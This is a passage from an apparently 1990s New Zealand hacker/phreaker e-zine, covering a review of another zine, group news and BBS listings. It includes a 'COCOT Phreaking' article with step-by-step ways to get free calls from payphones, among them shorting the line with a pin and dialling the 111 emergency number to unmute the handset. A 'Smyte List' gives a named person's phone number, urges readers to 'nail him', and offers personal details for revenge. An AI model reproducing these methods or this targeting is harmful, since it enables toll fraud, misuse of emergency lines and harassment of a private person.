than the use of the cat in the article, there isn't too much more I'd comment
on. Interesting mixture - could be useful...... somewhere.. =)
[Article Twenty-Three: 10 Metre Cigarette Lighter]
The 'cigarette lighter' trick seems okay, the sugar/flour idea is an ancient
idea created 'decades' ago. As for the petrol soaked rags, I don't think
there are many people who are planning on trying to KILL the 'victim' - at
least I'd like to think not.
[Article Twenty-Four: Exploding Rockz]
Could be sore. How do you feel about 'hail'? =)
[Article Twenty-Five: How to Cure a Hangover]
Interesting tips. I'll keep them in mind if I need them!
Oh, another tip for how to cure a hangover - so I was informed - just eat a
lemon. I know it would surely bring ME down to earth pretty quickly!
[Article Twenty-Six: Coca-Cola Recipe]
Is it really worth the trouble when, in some places, you can get 500ml
worth for a single dollar? What if you stuff up? You end up with a large
amount of worthless goo - mind you, you could try selling it to the city
council to use as TAR. *grin*
[Editors Note: Also, Coca, or the leaf of the coca plant, [Cocaine] would
be a LOT harder to find at the local supermarket.]
[Article Twenty-Seven: Voodoo Magic]
Each to one's own. If you believe it, go for it, I guess.
[Article Twenty-Eight: Excusez for Missing Class]
Lacked information on the consequences of truancy, and take it from someone
who's knowledgeable of these acts. It's just not worth it. As for the cheat-
ing in exams - What if you're caught? You may as well forget about getting
a job you'll enjoy - you'll be stuck with cleaning floors and packing
burgers, fries and Coke. Sounds fun, don't it?
[Editor's Note: Or making Coke!]
[Article Twenty-Nine: Greetz and Msgz to Contactz]
The title says it all... Couldn't find anything wrong with it. =)
[Article Thirty: ToT - The Future?]
Interesting reading. 'Know thine enemy'. Hehe, nah, I don't think it would
come to that, but just to be on the safe side... *manical grin* *wink*
[Article Thirty-One: Last Wordz]
Normally skipped by the reader, but worth a read anyway.
[FINAL ANALISYS]
Some of the ideas expressed in 'ToT#2' had already been 'spread about'
prior to the release of 'ToT Magazine #2', so repeating the ideas wouldn't
have made much impact - especially if a lot of people know about them
already. If anything, it's a waste of disk space (j/k!). Some of the art-
icles, I found rather childish and others a little dangerous - not to mention
a lack of warnings which was one of my main concerns (it was something we'd
also forgot about in our previous mags, but you wise up after chats with
Telecom/other authorities!).
As far as I'm concerned, I'd rate this magazine as a 7/10 (I haven't yet come
across a 10 yet, so consider me to be a hard marker.. ;) ). The magazine
on the whole was 'nice light reading' seeming that the articles are, on
average, between a third of a page and a page, in length. Not a bad try
for a local Wellington H/P/A group really seeming that they had at least
SOMEthing to say. If you've got a small attention span, and are new to the
H/P/A scene, then this is the magazine for you.
I found it to be of no practical use to me, but it may do for you - it depends
on WHAT you're actually looking for. You don't have to take my word for it -
Why not just grab a copy and read it for y'self?
Finally, I'd just like to say - Quality, not Quantity is the key to success
with a good magazine. Maybe if the editor was interested less in the latter,
and more in the prior, it may show promise.
Many electronic magazines don't start out the best - due to lack of organ-
isation - but they normally get sorted out by about their third issue if
you're really serious about it.
[NOTES]
We, at SLi, welcome ANY comments at all and thoughts of setting up a
'Letters to the Editors' section in the magazine are in the process of being
thought over. Letters will, or will not, be printed depending on whether
it's wanted or not - in respective order.
We can be reached at:
NOTE: All Internet addresses at the moment are on hold _DO_NOT_ e-mail us
at _ANY_ of our previous e-mail addresses.
This email address works at the time of publication:
hacker_m@ix.wcc.govt.nz
Snail Mail:
SLi
PO Box 3030
Onekawa
Napier
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ SLi ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
In this part of the mag, WE [the guys and gals of SLi] tell ya what the group
is doing.
WHAT IS SLi? and WHAT WE STAND FOR:
Freedom and the right to publish our views and the RIGHT to TEACH _YOU_
what we know. Read the article "Honour" if you want to see what rules
we TRY to live by.
Members resigned by choice from SLi:
Digital Omega -- Quit due to personal reasons.
Telco: Well CyntaxEra's "misuse of a telephone" ooops has sorted
itself out...
BBS: Is finally UP AND running, but VERY private. It's located in
Wellington, New Zealand.
Email hacker_m@ix.wcc.govt.nz for information on the number and
other miscellaneous info.
OFFICIAL SLi BBS's
~~~~~~~~~~~~~~~~~~
(ie. run by SLi MEMBERS)
BBS NAME MEMBER PHONE NUMBER/S SPEED MODEM
Hacker's Haven BBS Thorium +64-6-844-DATA(+646 844 3282) 28.8k BPS *
SLi BBS Eon +64-4-475-SCAN(+644 475 XXXX) 14.4k BPS !?
* = Only online sometimes.
! = No K0d3z kiddies and NO Warez Puppies!! :)
? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V
files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system!
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ COCOT Phreaking ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
COCOT Phreaking
~~~~~~~~~~~~~~~
For those of you who are reading this article without any previous knowledge
of the common everyday COCOT, I'll begin by giving you a brief outline of this
wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack
here]
C ustomer
O wned
C oin
O perated
T elephone.
There. Nothing to it. It's one of those small telephones you find in the old
shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin
Phone' within a 3-metre radius, the chances of there being one around greatly
decreases - or your handy service station. In the case of the latter suggest-
ion, there'll almost always be an attendant keeping an eye out on you, but if
they're slightly busy, they'll most probably be keeping there eyes out for
other things.
[Note: Telecom does know of the shortfalls of these fones, and warns their
"clients" of the problems these fones have. So the attendants MIGHT
know what's wrong with his/her fone and keep an eye out.]
In the following, I'll just go over my 'observations' of these fones, and at-
tempt to explain a bit about how they work - well, as far as I'm aware of, any-
way.
[Note: Considering the fact that New Zealand doesn't have the same 'Freedom of
Speech' Act, as there is in the States, I'm a little wary of writing
this article, so I'll try and keep the ideas to a minimum - that's all
they are... ideas.]
[Type One]
Description: 'Blue-Buttoned Telephone'.
[NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone,
but, if you are trying 'Idea Two', you must use the particular type
which is listed below.]
LCD Display shows a blinking 'COIN' which takes up the entire LCD display.
When dialling, it doesn't bring up the number onto the display, but you
SHOULD be able to hear it dialling.
Major Colours: Blue, white, grey and black.
[Idea One]
Get a pin. Dial the number you want to call, push the pin through the wire,
running from the fone into the wall, so it shorts the wires together thus
making it impossible for the fone to disconnect. Hang up the fone and pick
it back up. Dial '111' and pull the pin out. There you go - a free call.
[Idea Two]
Pick up the receiver and dial the number you want - as though you would nor-
mally. It should dial the number for you, and if the line isn't busy, you
should be put through okay. Once the person answers, dial '111' and it should
free you from the mute - allowing you to speak freely with the person you have
just called. If you get a 'no-such-number' answer, then perhaps there is a
toll-bar on the phone line of the COCOT, otherwise, try another COCOT.
[Explanation]
With these 'blue-buttoned fones', you get your dial-tone and you're even per-
mitted to use the keypad. The only problem... the microphone. The micro-
phone is muted to stop the person from using the telephone and (from what I'm
aware of) can only be 'de-muted' by the user of the telephone inserting a
coin, OR dialling '111' [the emergency phone number in NZ - for those of you
who are unfamiliar with the number].
After the numbers '111' are dialled - regardless of wether the phone has a
dial-tone, or not - the microphone loses the 'mute button', and allows the
user of the fone to speak into the microphone whilst allowing the receiver
of the call to hear the caller. Of course, the receiver of the phone is un-
changed, which allows the caller to hear the recipient of the call, to allow
the caller to hear the dial-tone.
[Type Two]
Description: 'Brown-Buttoned Telephone'
[NOTE: They have a big orange button with an 'A' on it.]
These fones are becoming less common, but are still around. They have been
replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add-
ed especially to help us fone phreaks out (NOT!). A few times, I have come
across the odd one or two which have an interrupted dial-tone - a fake one
which sticks around until you drop your dandy coin into the coin slot.
Major Colours: Brown, orange, white and traces of black.
[Idea One]
Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned
telephone'. Just put the dialler's microphone up to the UN-MUTED microphone
on the telephone's receiver, and dial away. Once the person answers, begin to
talk. =)
[Explanation]
The coin's only use appears to be to give the caller access to the dialling
pad. Well, the older versions seem to give that appearance - seeming that
there are newer versions hanging about with similar problems (ie. the false
dial-tone). The outer casing (the telephone case) is the same and the only
way to tell the difference is to try things out for yourself. This is a case
of just hoping that you're lucky enough to find the ones which work.
[Type Three]
Description: 'The Red Phone'
These are these rather big, rather OLD, rather chunky, rather, err, well,
RED fones. they have a little red button on them that automatically dials
'111'.
Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for
the numbers.
[Idea One]
The keypad is the only thing not connected so the ol' DTMF trick will work
fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of
you who don't know that already]. Simple, aint it?
[Idea Two]
I assume you can also pulse dial using the switch-hook.
For those who don't know how to use pulse-dialling, just tap the switch-hook
down for a 'split-second' the number of times you need to dial the number with
a space of silence between each number (so it knows when the next number is
being dialled). It is a VERY old trick, but I thought I'd add it for those
interested.
[NOTE: These apply to NZ, but I can't remember what they are everywhere else
and plus, I'm not going to type down ALL of the respective numbers!]
Phone Number Number of times
to press s-h
0 - 10
1 - 9
2 - 8
3 - 7
4 - 6
5 - 5
6 - 4
7 - 3
8 - 2
9 - 1
ie. Say you want to dial, 001-202-542-873, you would do this:
tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause,
8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7.
An easy way of remembering it, is to simply add the number to the amount of
taps of the switch-hook and it should equal 10.
This is an old idea, but it works on these old phones.
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Smyte List ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Well, as in all other SLi mags - except #1 - here's a person [and
his info] who has done a pretty stupid thing, and got the members of
SLi pissed at him.
Name Info Reason
--------------------+-------------------------+------------------------------
Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to
aka [-=[THE_FLY]=-] mention a LOT of other ppl.
[Eon's note: This guy insulted
Cyntax and I. He DESERVES
ALL he GETS. Nail him.]
[Note: If you have someone who has pissed you off lately, you want to 'get in
touch' with them and think that we MIGHT have their info, just giz us
a bell with your reason for getting back at this person and we'll see
what we can do for ya.]
SLi
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^ ^^^^^
^^^^^ Editors Knotez ^^^^^
^^^^^ ^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Southern Lights
inc.
Damn it! Yet another one of these things! :)
Ahh, well, me and Cyntax 'ave given up dak,
Oh, yeah - Happy April Fools! :=)
Well, it's the end of another SLi mag. Guess it's getting rather predict-
able now.
Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you
want the number and instructions to login including the bbs passwd and
stuff. Oh, BTW, it's 14.4... :)
ALSO!!! if you want to send us a note, post it to our PO BOX.
Here is the shout out you wanted MysTix!
PS. SLi V should be out in 3-4 months.
Yeah someone wrote me asking if there was a way to turn off call waiting.
Now, I think it's *52.
Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security)
isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone
wanna write me a letter? I'm sure you can find my address :\ I take that
back. I'll just say, "tnx Heather" :-<
[Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her
VMB "ooops". So be it.]
God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has!
And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black
rectangles! Of course this is MY opinion and may not be that of the
civilized world
[CyntaxEra's Note: Apologies go out to any people reading this who have that
tie - we're very sorry for you. ;)]
Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and
512 on our misc stuff - thanks to PGP 2.4x <not the new one, 'cause the US
Government have indorced it>.
Any BBS's that would like to become an OFFICIAL SLi release point, please
POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ.
A Final NOTE:
We are ALL New Zealanders - not black, not white but united under ONE
flag. We are one nation. May we once again become one people.
Our flag is the symbol of our country, to all who spit on it, to all who
stomp on it. Take note that thousands died for that flag - both white and
black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we
are ONE people united. If you wish to show your disaproval, do it in a
rightous and honourable way. Not in such a childish and immature way
without any fore-thought at all.
[This is in accordance to the current disagreements between NZ and a small
percentage of Maori New Zealanders in reference to this year's Waitangi Day -
A day which should have been celebrated by all. Sadly the acts of a few have
made this country two people under one divided flag. Be ashamed of yourself
all who took part in the division of New Zealand, for these acts will live in
the history of New Zealand forever as the day New Zealanders became two
peoples.]
Well, I'll see you all 'round... 'Till next time...
^L
Life is Cursed.
For all who live must die.
eof